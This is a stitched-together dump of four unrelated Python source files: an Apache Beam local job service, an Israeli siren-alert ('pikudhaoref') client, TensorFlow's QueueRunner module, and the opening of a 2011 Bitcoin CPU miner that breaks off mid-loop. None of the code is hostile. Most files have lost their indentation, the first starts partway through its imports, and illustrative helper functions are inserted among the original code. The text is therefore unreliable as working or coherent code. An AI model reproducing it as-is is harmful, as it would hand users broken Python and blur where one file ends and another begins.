from apache_beam.metrics import monitoring_infos
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import abstract_job_service
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability.fn_api_runner import fn_runner
from apache_beam.runners.portability.fn_api_runner import worker_handlers
from apache_beam.utils import thread_pool_executor
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.portability.api import beam_runner_api_pb2
_LOGGER = logging.getLogger(__name__)
def _iter_queue(q):
while True:
yield q.get(block=True)
class LocalJobServicer(abstract_job_service.AbstractJobServiceServicer):
"""Manages one or more pipelines, possibly concurrently.
Experimental: No backward compatibility guaranteed.
Servicer for the Beam Job API.
  This JobService uses a basic local implementation of the runner to run the job.
  This JobService is not capable of managing jobs on remote clusters.
By default, this JobService executes the job in process but still uses GRPC
to communicate pipeline and worker state. It can also be configured to use
inline calls rather than GRPC (for speed) or launch completely separate
subprocesses for the runner and worker(s).
"""
def __init__(self, staging_dir=None):
super(LocalJobServicer, self).__init__()
self._cleanup_staging_dir = staging_dir is None
self._staging_dir = staging_dir or tempfile.mkdtemp()
self._legacy_artifact_service = (
artifact_service.BeamFilesystemArtifactService(self._staging_dir))
self._artifact_service = artifact_service.ArtifactStagingService(
artifact_service.BeamFilesystemHandler(self._staging_dir).file_writer)
self._artifact_staging_endpoint = None # type: Optional[endpoints_pb2.ApiServiceDescriptor]
def create_beam_job(self,
                      preparation_id,  # type: str
job_name, # type: str
pipeline, # type: beam_runner_api_pb2.Pipeline
options # type: struct_pb2.Struct
):
# type: (...) -> BeamJob
# TODO(angoenka): Pass an appropriate staging_session_token. The token can
# be obtained in PutArtifactResponse from JobService
if not self._artifact_staging_endpoint:
# The front-end didn't try to stage anything, but the worker may
# request what's here so we should at least store an empty manifest.
self._legacy_artifact_service.CommitManifest(
beam_artifact_api_pb2.CommitManifestRequest(
staging_session_token=preparation_id,
manifest=beam_artifact_api_pb2.Manifest()))
self._artifact_service.register_job(
staging_token=preparation_id,
dependency_sets={
id: env.dependencies
for (id, env) in pipeline.components.environments.items()
})
provision_info = fn_runner.ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
pipeline_options=options,
retrieval_token=self._legacy_artifact_service.retrieval_token(
preparation_id)),
self._staging_dir,
job_name=job_name)
return BeamJob(
preparation_id,
pipeline,
options,
provision_info,
self._artifact_staging_endpoint,
self._artifact_service)
def get_bind_address(self):
"""Return the address used to open the port on the gRPC server.
This is often, but not always the same as the service address. For
example, to make the service accessible to external machines, override this
to return '[::]' and override `get_service_address()` to return a publicly
accessible host name.
"""
return self.get_service_address()
def get_service_address(self):
"""Return the host name at which this server will be accessible.
In particular, this is provided to the client upon connection as the
artifact staging endpoint.
"""
return 'localhost'
def start_grpc_server(self, port=0):
self._server = grpc.server(thread_pool_executor.shared_unbounded_instance())
port = self._server.add_insecure_port(
'%s:%d' % (self.get_bind_address(), port))
beam_job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self._server)
beam_artifact_api_pb2_grpc.add_LegacyArtifactStagingServiceServicer_to_server(
self._legacy_artifact_service, self._server)
beam_artifact_api_pb2_grpc.add_ArtifactStagingServiceServicer_to_server(
self._artifact_service, self._server)
hostname = self.get_service_address()
self._artifact_staging_endpoint = endpoints_pb2.ApiServiceDescriptor(
url='%s:%d' % (hostname, port))
self._server.start()
_LOGGER.info('Grpc server started at %s on port %d' % (hostname, port))
return port
def stop(self, timeout=1):
self._server.stop(timeout)
if os.path.exists(self._staging_dir) and self._cleanup_staging_dir:
shutil.rmtree(self._staging_dir, ignore_errors=True)
def GetJobMetrics(self, request, context=None):
if request.job_id not in self._jobs:
raise LookupError("Job {} does not exist".format(request.job_id))
result = self._jobs[request.job_id].result
monitoring_info_list = []
for mi in result._monitoring_infos_by_stage.values():
monitoring_info_list.extend(mi)
# Filter out system metrics
user_monitoring_info_list = [
x for x in monitoring_info_list
if monitoring_infos.is_user_monitoring_info(x)
]
return beam_job_api_pb2.GetJobMetricsResponse(
metrics=beam_job_api_pb2.MetricResults(
committed=user_monitoring_info_list))
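# Illustrative sketch (not part of the original module): starting and stopping the
# LocalJobServicer defined above. The port choice (0 = pick any free port) and the
# surrounding setup are hypothetical; a portable runner client would submit pipelines
# against the returned Job API endpoint.
def _example_run_local_job_service():
  servicer = LocalJobServicer()
  port = servicer.start_grpc_server(port=0)
  try:
    _LOGGER.info('Job API available at %s:%d', servicer.get_service_address(), port)
  finally:
    servicer.stop()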
class SubprocessSdkWorker(object):
"""Manages a SDK worker implemented as a subprocess communicating over grpc.
"""
def __init__(
self,
worker_command_line, # type: bytes
control_address,
worker_id=None):
self._worker_command_line = worker_command_line
self._control_address = control_address
self._worker_id = worker_id
def run(self):
logging_server = grpc.server(
thread_pool_executor.shared_unbounded_instance())
logging_port = logging_server.add_insecure_port('[::]:0')
logging_server.start()
logging_servicer = BeamFnLoggingServicer()
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
logging_servicer, logging_server)
logging_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url='localhost:%s' % logging_port))
control_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url=self._control_address))
env_dict = dict(
os.environ,
CONTROL_API_SERVICE_DESCRIPTOR=control_descriptor,
LOGGING_API_SERVICE_DESCRIPTOR=logging_descriptor)
# only add worker_id when it is set.
if self._worker_id:
env_dict['WORKER_ID'] = self._worker_id
with worker_handlers.SUBPROCESS_LOCK:
p = subprocess.Popen(self._worker_command_line, shell=True, env=env_dict)
try:
p.wait()
if p.returncode:
raise RuntimeError(
'Worker subprocess exited with return code %s' % p.returncode)
finally:
if p.poll() is None:
p.kill()
logging_server.stop(0)
class BeamJob(abstract_job_service.AbstractBeamJob):
"""This class handles running and managing a single pipeline.
The current state of the pipeline is available as self.state.
"""
def __init__(self,
job_id, # type: str
pipeline,
options,
provision_info, # type: fn_runner.ExtendedProvisionInfo
artifact_staging_endpoint, # type: Optional[endpoints_pb2.ApiServiceDescriptor]
artifact_service, # type: artifact_service.ArtifactStagingService
):
super(BeamJob,
self).__init__(job_id, provision_info.job_name, pipeline, options)
self._provision_info = provision_info
self._artifact_staging_endpoint = artifact_staging_endpoint
self._artifact_service = artifact_service
self._state_queues = [] # type: List[queue.Queue]
self._log_queues = [] # type: List[queue.Queue]
self.daemon = True
self.result = None
def set_state(self, new_state):
"""Set the latest state as an int enum and notify consumers"""
timestamp = super(BeamJob, self).set_state(new_state)
if timestamp is not None:
# Inform consumers of the new state.
for queue in self._state_queues:
queue.put((new_state, timestamp))
def prepare(self):
pass
def artifact_staging_endpoint(self):
return self._artifact_staging_endpoint
def run(self):
self.set_state(beam_job_api_pb2.JobState.STARTING)
self._run_thread = threading.Thread(target=self._run_job)
self._run_thread.start()
def _run_job(self):
self.set_state(beam_job_api_pb2.JobState.RUNNING)
with JobLogHandler(self._log_queues):
self._update_dependencies()
try:
result = fn_runner.FnApiRunner(
provision_info=self._provision_info).run_via_runner_api(
self._pipeline_proto)
_LOGGER.info('Successfully completed job.')
self.set_state(beam_job_api_pb2.JobState.DONE)
self.result = result
except: # pylint: disable=bare-except
_LOGGER.exception('Error running pipeline.')
        _LOGGER.exception(traceback.format_exc())
self.set_state(beam_job_api_pb2.JobState.FAILED)
raise
def _update_dependencies(self):
try:
for env_id, deps in self._artifact_service.resolved_deps(
self._job_id, timeout=0).items():
# Slice assignment not supported for repeated fields.
env = self._pipeline_proto.components.environments[env_id]
del env.dependencies[:]
env.dependencies.extend(deps)
self._provision_info.provision_info.ClearField('retrieval_token')
except concurrent.futures.TimeoutError:
pass # TODO(BEAM-9577): Require this once all SDKs support it.
def cancel(self):
if not self.is_terminal_state(self.state):
self.set_state(beam_job_api_pb2.JobState.CANCELLING)
# TODO(robertwb): Actually cancel...
self.set_state(beam_job_api_pb2.JobState.CANCELLED)
def get_state_stream(self):
# Register for any new state changes.
state_queue = queue.Queue()
self._state_queues.append(state_queue)
for state, timestamp in self.with_state_history(_iter_queue(state_queue)):
yield state, timestamp
if self.is_terminal_state(state):
break
def get_message_stream(self):
# Register for any new messages.
log_queue = queue.Queue()
self._log_queues.append(log_queue)
self._state_queues.append(log_queue)
for msg in self.with_state_history(_iter_queue(log_queue)):
if isinstance(msg, tuple):
assert len(msg) == 2 and isinstance(msg[0], int)
current_state = msg[0]
yield msg
if self.is_terminal_state(current_state):
break
else:
yield msg
class BeamFnLoggingServicer(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
def Logging(self, log_bundles, context=None):
for log_bundle in log_bundles:
for log_entry in log_bundle.log_entries:
_LOGGER.info('Worker: %s', str(log_entry).replace('\n', ' '))
return iter([])
class JobLogHandler(logging.Handler):
"""Captures logs to be returned via the Beam Job API.
Enabled via the with statement."""
# Mapping from logging levels to LogEntry levels.
LOG_LEVEL_MAP = {
logging.FATAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.CRITICAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.ERROR: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.WARNING: beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING,
logging.INFO: beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC,
logging.DEBUG: beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG,
}
def __init__(self, log_queues):
super(JobLogHandler, self).__init__()
self._last_id = 0
self._logged_thread = None
self._log_queues = log_queues
def __enter__(self):
# Remember the current thread to demultiplex the logs of concurrently
# running pipelines (as Python log handlers are global).
self._logged_thread = threading.current_thread()
logging.getLogger().addHandler(self)
def __exit__(self, *args):
self._logged_thread = None
self.close()
def _next_id(self):
self._last_id += 1
return str(self._last_id)
def emit(self, record):
if self._logged_thread is threading.current_thread():
msg = beam_job_api_pb2.JobMessage(
message_id=self._next_id(),
time=time.strftime(
'%Y-%m-%d %H:%M:%S.', time.localtime(record.created)),
importance=self.LOG_LEVEL_MAP[record.levelno],
message_text=self.format(record))
# Inform all message consumers.
for queue in self._log_queues:
queue.put(msg)
|
client.py
|
from __future__ import annotations
import asyncio
import time
from datetime import datetime
from io import BytesIO
from threading import Thread
from typing import Union, List, TYPE_CHECKING
from .abc import Client
from .enums import HistoryMode
from .http import SyncHTTPClient, AsyncHTTPClient
from .siren import Siren
if TYPE_CHECKING:
from .city import City
from .range import Range
__all__ = ("SyncClient", "AsyncClient")
class SyncClient(Client):
"""
Represents a sync pikudhaoref client.
"""
__slots__ = ()
def __init__(self, update_interval: Union[int, float] = 2, proxy: str = None):
"""
:param Union[int, float] update_interval: The update interval of the client.
"""
super().__init__()
self.update_interval = update_interval
self.http = SyncHTTPClient(proxy=proxy)
self._initialized = False
self.closed = False
self._known_sirens = []
self.city_cache = []
self.initialize()
Thread(target=self._handle_sirens, daemon=True).start()
def initialize(self):
if not self._initialized:
for city in self.http.city_data:
self.city_cache.append(self.get_city(city["he"]))
self._initialized = True
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.closed = True
self.http.session.close()
def get_history(
self,
mode: HistoryMode = HistoryMode.TODAY,
date_range: Range = None,
get_city: bool = False,
) -> List[Siren]:
if date_range:
sirens = self.http.get_range_history(date_range.start, date_range.end)
else:
sirens = self.http.get_history(mode.value)
if get_city:
for siren in sirens:
siren["data"] = self.get_city(siren["data"])
return [Siren.from_raw(x) for x in sirens]
def create_map(self, cities: List[City], key: str = None) -> BytesIO:
return self.http.create_map(cities, key)
@property
def current_sirens(self) -> List[Siren]:
return [
Siren(self.get_city(x), datetime.utcnow())
for x in self.remove_duplicates(self.http.get_current_sirens())
]
def _handle_sirens(self):
self.initialize()
while not self.closed:
time.sleep(self.update_interval)
sirens = self.current_sirens
new_sirens = [
siren
for siren in sirens
if siren.city not in [siren.city for siren in self._known_sirens]
]
if new_sirens:
self._known_sirens.extend(new_sirens)
self.call_sync_event("on_siren", new_sirens)
if not sirens:
ended_sirens = [
x
for x in self._known_sirens
if x.city not in [siren.city for siren in sirens]
]
if ended_sirens:
self.call_sync_event("on_siren_end", ended_sirens)
self._known_sirens = []
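# Illustrative sketch (not part of the original module): minimal synchronous usage of
# the client defined above. The update interval is an arbitrary example value;
# get_history(), current_sirens and the context-manager protocol are the APIs defined
# in SyncClient.
def _example_sync_usage():
    with SyncClient(update_interval=2) as client:
        print("Sirens today:", client.get_history(mode=HistoryMode.TODAY))
        print("Currently active sirens:", client.current_sirens)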
class AsyncClient(Client):
"""
Represents an async pikudhaoref client.
"""
__slots__ = ("loop",)
def __init__(
self,
update_interval: Union[int, float] = 2,
loop: asyncio.AbstractEventLoop = None,
proxy: str = None,
):
"""
:param Union[int, float] update_interval: The update interval of the client.
"""
super().__init__()
self.loop = loop or asyncio.get_event_loop()
self.update_interval = update_interval
self.http = AsyncHTTPClient(loop=loop, proxy=proxy)
self._initialized = False
self.closed = False
self.city_cache = []
self._known_sirens = []
        # Schedule the siren handler on the resolved loop (falls back to the
        # default event loop when none is passed in).
        self.loop.create_task(self._handle_sirens())
async def initialize(self):
if not self._initialized:
await self.http.initialize_city_data()
for city in self.http.city_data:
self.city_cache.append(self.get_city(city["he"]))
            self._initialized = True
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_value, exc_traceback):
self.closed = True
await self.http.session.close()
async def get_history(
self,
mode: HistoryMode = HistoryMode.TODAY,
range_: Range = None,
get_city: bool = False,
) -> List[Siren]:
if range_:
sirens = await self.http.get_range_history(range_.start, range_.end)
else:
sirens = await self.http.get_history(mode.value)
if get_city:
for siren in sirens:
siren["data"] = self.get_city(siren["data"])
return [Siren.from_raw(x) for x in sirens]
async def current_sirens(self) -> List[Siren]:
return [
Siren(self.get_city(x), datetime.utcnow())
for x in self.remove_duplicates(await self.http.get_current_sirens())
]
async def create_map(self, cities: List[City], key: str = None) -> BytesIO:
return await self.http.create_map(cities, key)
async def _handle_sirens(self):
await self.initialize()
while not self.closed:
await asyncio.sleep(self.update_interval)
sirens = await self.current_sirens()
new_sirens = [
siren
for siren in sirens
if siren.city not in [siren.city for siren in self._known_sirens]
]
if new_sirens:
self._known_sirens.extend(new_sirens)
await self.call_async_event("on_siren", new_sirens)
if not sirens:
ended_sirens = [
x
for x in self._known_sirens
if x.city not in [siren.city for siren in sirens]
]
if ended_sirens:
await self.call_async_event("on_siren_end", ended_sirens)
self._known_sirens = []
|
queue_runner.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Create threads to run multiple enqueue ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.core.protobuf import queue_runner_pb2
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
class QueueRunner(object):
"""Holds a list of enqueue operations for a queue, each to be run in a thread.
Queues are a convenient TensorFlow mechanism to compute tensors
asynchronously using multiple threads. For example in the canonical 'Input
Reader' setup one set of threads generates filenames in a queue; a second set
of threads read records from the files, processes them, and enqueues tensors
on a second queue; a third set of threads dequeues these input records to
construct batches and runs them through training operations.
There are several delicate issues when running multiple threads that way:
closing the queues in sequence as the input is exhausted, correctly catching
and reporting exceptions, etc.
The `QueueRunner`, combined with the `Coordinator`, helps handle these issues.
"""
def __init__(self, queue=None, enqueue_ops=None, close_op=None,
cancel_op=None, queue_closed_exception_types=None,
queue_runner_def=None, import_scope=None):
"""Create a QueueRunner.
On construction the `QueueRunner` adds an op to close the queue. That op
will be run if the enqueue ops raise exceptions.
When you later call the `create_threads()` method, the `QueueRunner` will
create one thread for each op in `enqueue_ops`. Each thread will run its
enqueue op in parallel with the other threads. The enqueue ops do not have
to all be the same op, but it is expected that they all enqueue tensors in
`queue`.
Args:
queue: A `Queue`.
enqueue_ops: List of enqueue ops to run in threads later.
close_op: Op to close the queue. Pending enqueue ops are preserved.
cancel_op: Op to close the queue and cancel pending enqueue ops.
queue_closed_exception_types: Optional tuple of Exception types that
indicate that the queue has been closed when raised during an enqueue
operation. Defaults to `(tf.errors.OutOfRangeError,)`. Another common
case includes `(tf.errors.OutOfRangeError, tf.errors.CancelledError)`,
when some of the enqueue ops may dequeue from other Queues.
queue_runner_def: Optional `QueueRunnerDef` protocol buffer. If specified,
recreates the QueueRunner from its contents. `queue_runner_def` and the
other arguments are mutually exclusive.
import_scope: Optional `string`. Name scope to add. Only used when
initializing from protocol buffer.
Raises:
      ValueError: If both `queue_runner_def` and `queue` are specified.
ValueError: If `queue` or `enqueue_ops` are not provided when not
restoring from `queue_runner_def`.
"""
if queue_runner_def:
if queue or enqueue_ops:
raise ValueError("queue_runner_def and queue are mutually exclusive.")
self._init_from_proto(queue_runner_def,
import_scope=import_scope)
else:
self._init_from_args(
queue=queue, enqueue_ops=enqueue_ops,
close_op=close_op, cancel_op=cancel_op,
queue_closed_exception_types=queue_closed_exception_types)
# Protect the count of runs to wait for.
self._lock = threading.Lock()
self._runs = 0
# List of exceptions raised by the running threads.
self._exceptions_raised = []
def _init_from_args(self, queue=None, enqueue_ops=None, close_op=None,
cancel_op=None, queue_closed_exception_types=None):
"""Create a QueueRunner from arguments.
Args:
queue: A `Queue`.
enqueue_ops: List of enqueue ops to run in threads later.
close_op: Op to close the queue. Pending enqueue ops are preserved.
cancel_op: Op to close the queue and cancel pending enqueue ops.
queue_closed_exception_types: Tuple of exception types, which indicate
the queue has been safely closed.
Raises:
ValueError: If `queue` or `enqueue_ops` are not provided when not
restoring from `queue_runner_def`.
TypeError: If `queue_closed_exception_types` is provided, but is not
a non-empty tuple of error types (subclasses of `tf.errors.OpError`).
"""
if not queue or not enqueue_ops:
raise ValueError("Must provide queue and enqueue_ops.")
self._queue = queue
self._enqueue_ops = enqueue_ops
self._close_op = close_op
self._cancel_op = cancel_op
if queue_closed_exception_types is not None:
if (not isinstance(queue_closed_exception_types, tuple)
or not queue_closed_exception_types
or not all(issubclass(t, errors.OpError)
for t in queue_closed_exception_types)):
raise TypeError(
"queue_closed_exception_types, when provided, "
"must be a non-empty list of tf.error types, but saw: %s"
% queue_closed_exception_types)
self._queue_closed_exception_types = queue_closed_exception_types
# Close when no more will be produced, but pending enqueues should be
# preserved.
if self._close_op is None:
self._close_op = self._queue.close()
# Close and cancel pending enqueues since there was an error and we want
# to unblock everything so we can cleanly exit.
if self._cancel_op is None:
self._cancel_op = self._queue.close(cancel_pending_enqueues=True)
if not self._queue_closed_exception_types:
self._queue_closed_exception_types = (errors.OutOfRangeError,)
else:
self._queue_closed_exception_types = tuple(
self._queue_closed_exception_types)
def _init_from_proto(self, queue_runner_def, import_scope=None):
"""Create a QueueRunner from `QueueRunnerDef`.
Args:
queue_runner_def: Optional `QueueRunnerDef` protocol buffer.
import_scope: Optional `string`. Name scope to add.
"""
assert isinstance(queue_runner_def, queue_runner_pb2.QueueRunnerDef)
g = ops.get_default_graph()
self._queue = g.as_graph_element(
ops.prepend_name_scope(queue_runner_def.queue_name, import_scope))
self._enqueue_ops = [g.as_graph_element(
ops.prepend_name_scope(op, import_scope))
for op in queue_runner_def.enqueue_op_name]
self._close_op = g.as_graph_element(ops.prepend_name_scope(
queue_runner_def.close_op_name, import_scope))
self._cancel_op = g.as_graph_element(ops.prepend_name_scope(
queue_runner_def.cancel_op_name, import_scope))
self._queue_closed_exception_types = tuple(
errors.exception_type_from_error_code(code)
for code in queue_runner_def.queue_closed_exception_types)
# Legacy support for old QueueRunnerDefs created before this field
# was added.
if not self._queue_closed_exception_types:
self._queue_closed_exception_types = (errors.OutOfRangeError,)
@property
def queue(self):
return self._queue
@property
def enqueue_ops(self):
return self._enqueue_ops
@property
def close_op(self):
return self._close_op
@property
def cancel_op(self):
return self._cancel_op
@property
def queue_closed_exception_types(self):
return self._queue_closed_exception_types
@property
def exceptions_raised(self):
"""Exceptions raised but not handled by the `QueueRunner` threads.
Exceptions raised in queue runner threads are handled in one of two ways
depending on whether or not a `Coordinator` was passed to
`create_threads()`:
* With a `Coordinator`, exceptions are reported to the coordinator and
forgotten by the `QueueRunner`.
* Without a `Coordinator`, exceptions are captured by the `QueueRunner` and
made available in this `exceptions_raised` property.
Returns:
A list of Python `Exception` objects. The list is empty if no exception
was captured. (No exceptions are captured when using a Coordinator.)
"""
return self._exceptions_raised
@property
def name(self):
"""The string name of the underlying Queue."""
return self._queue.name
# pylint: disable=broad-except
def _run(self, sess, enqueue_op, coord=None):
"""Execute the enqueue op in a loop, close the queue in case of error.
Args:
sess: A Session.
enqueue_op: The Operation to run.
coord: Optional Coordinator object for reporting errors and checking
for stop conditions.
"""
if coord:
coord.register_thread(threading.current_thread())
decremented = False
try:
while True:
if coord and coord.should_stop():
break
try:
sess.run(enqueue_op)
except self._queue_closed_exception_types: # pylint: disable=catching-non-exception
# This exception indicates that a queue was closed.
with self._lock:
self._runs -= 1
decremented = True
if self._runs == 0:
try:
sess.run(self._close_op)
except Exception as e:
# Intentionally ignore errors from close_op.
logging.vlog(1, "Ignored exception: %s", str(e))
return
except Exception as e:
# This catches all other exceptions.
if coord:
coord.request_stop(e)
else:
logging.error("Exception in QueueRunner: %s", str(e))
with self._lock:
self._exceptions_raised.append(e)
raise
finally:
# Make sure we account for all terminations: normal or errors.
if not decremented:
with self._lock:
self._runs -= 1
def _close_on_stop(self, sess, cancel_op, coord):
"""Close the queue when the Coordinator requests stop.
Args:
sess: A Session.
cancel_op: The Operation to run.
coord: Coordinator.
"""
coord.register_thread(threading.current_thread())
coord.wait_for_stop()
try:
sess.run(cancel_op)
except Exception as e:
# Intentionally ignore errors from cancel_op.
logging.vlog(1, "Ignored exception: %s", str(e))
# pylint: enable=broad-except
def create_threads(self, sess, coord=None, daemon=False, start=False):
"""Create threads to run the enqueue ops.
This method requires a session in which the graph was launched. It creates
a list of threads, optionally starting them. There is one thread for each
op passed in `enqueue_ops`.
The `coord` argument is an optional coordinator, that the threads will use
to terminate together and report exceptions. If a coordinator is given,
this method starts an additional thread to close the queue when the
coordinator requests a stop.
This method may be called again as long as all threads from a previous call
have stopped.
Args:
sess: A `Session`.
coord: Optional `Coordinator` object for reporting errors and checking
stop conditions.
daemon: Boolean. If `True` make the threads daemon threads.
start: Boolean. If `True` starts the threads. If `False` the
caller must call the `start()` method of the returned threads.
Returns:
A list of threads.
Raises:
RuntimeError: If threads from a previous call to `create_threads()` are
still running.
"""
with self._lock:
if self._runs > 0:
# Already started: no new threads to return.
return []
self._runs = len(self._enqueue_ops)
self._exceptions_raised = []
ret_threads = [threading.Thread(target=self._run, args=(sess, op, coord))
for op in self._enqueue_ops]
if coord:
ret_threads.append(threading.Thread(target=self._close_on_stop,
args=(sess, self._cancel_op, coord)))
for t in ret_threads:
if daemon:
t.daemon = True
if start:
t.start()
return ret_threads
def to_proto(self, export_scope=None):
"""Converts this `QueueRunner` to a `QueueRunnerDef` protocol buffer.
Args:
export_scope: Optional `string`. Name scope to remove.
Returns:
A `QueueRunnerDef` protocol buffer, or `None` if the `Variable` is not in
the specified name scope.
"""
if (export_scope is None or
self.queue.name.startswith(export_scope)):
queue_runner_def = queue_runner_pb2.QueueRunnerDef()
queue_runner_def.queue_name = ops.strip_name_scope(
self.queue.name, export_scope)
for enqueue_op in self.enqueue_ops:
queue_runner_def.enqueue_op_name.append(
ops.strip_name_scope(enqueue_op.name, export_scope))
queue_runner_def.close_op_name = ops.strip_name_scope(
self.close_op.name, export_scope)
queue_runner_def.cancel_op_name = ops.strip_name_scope(
self.cancel_op.name, export_scope)
queue_runner_def.queue_closed_exception_types.extend([
errors.error_code_from_exception_type(cls)
for cls in self._queue_closed_exception_types])
return queue_runner_def
else:
return None
@staticmethod
def from_proto(queue_runner_def, import_scope=None):
"""Returns a `QueueRunner` object created from `queue_runner_def`."""
return QueueRunner(queue_runner_def=queue_runner_def,
import_scope=import_scope)
def add_queue_runner(qr, collection=ops.GraphKeys.QUEUE_RUNNERS):
"""Adds a `QueueRunner` to a collection in the graph.
When building a complex model that uses many queues it is often difficult to
gather all the queue runners that need to be run. This convenience function
allows you to add a queue runner to a well known collection in the graph.
The companion method `start_queue_runners()` can be used to start threads for
all the collected queue runners.
Args:
qr: A `QueueRunner`.
collection: A `GraphKey` specifying the graph collection to add
the queue runner to. Defaults to `GraphKeys.QUEUE_RUNNERS`.
"""
ops.add_to_collection(collection, qr)
def start_queue_runners(sess=None, coord=None, daemon=True, start=True,
collection=ops.GraphKeys.QUEUE_RUNNERS):
"""Starts all queue runners collected in the graph.
This is a companion method to `add_queue_runner()`. It just starts
threads for all queue runners collected in the graph. It returns
the list of all threads.
Args:
sess: `Session` used to run the queue ops. Defaults to the
default session.
coord: Optional `Coordinator` for coordinating the started threads.
daemon: Whether the threads should be marked as `daemons`, meaning
they don't block program exit.
start: Set to `False` to only create the threads, not start them.
collection: A `GraphKey` specifying the graph collection to
get the queue runners from. Defaults to `GraphKeys.QUEUE_RUNNERS`.
Returns:
A list of threads.
"""
if sess is None:
sess = ops.get_default_session()
if not sess:
raise ValueError("Cannot start queue runners: No default session is "
"registered. Use `with sess.as_default()` or pass an "
"explicit session to tf.start_queue_runners(sess=sess)")
with sess.graph.as_default():
threads = []
for qr in ops.get_collection(collection):
threads.extend(qr.create_threads(sess, coord=coord, daemon=daemon,
start=start))
return threads
ops.register_proto_function(ops.GraphKeys.QUEUE_RUNNERS,
proto_type=queue_runner_pb2.QueueRunnerDef,
to_proto=QueueRunner.to_proto,
from_proto=QueueRunner.from_proto)
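# --- Usage sketch (not part of the original module) ---------------------------
# A minimal, hedged example of the QueueRunner/Coordinator pattern described in
# the docstrings above, written against the public TF 1.x `tf.train` aliases of
# these classes. The queue contents are arbitrary placeholders.
if __name__ == "__main__":
  import tensorflow as tf

  queue = tf.FIFOQueue(capacity=32, dtypes=[tf.float32])
  enqueue_op = queue.enqueue(tf.random_normal([]))
  dequeue_op = queue.dequeue()

  # One QueueRunner with four parallel enqueue threads.
  qr = tf.train.QueueRunner(queue, [enqueue_op] * 4)
  tf.train.add_queue_runner(qr)

  with tf.Session() as sess:
    coord = tf.train.Coordinator()
    started_threads = tf.train.start_queue_runners(sess=sess, coord=coord)
    for _ in range(10):
      print(sess.run(dequeue_op))
    coord.request_stop()
    coord.join(started_threads)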
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
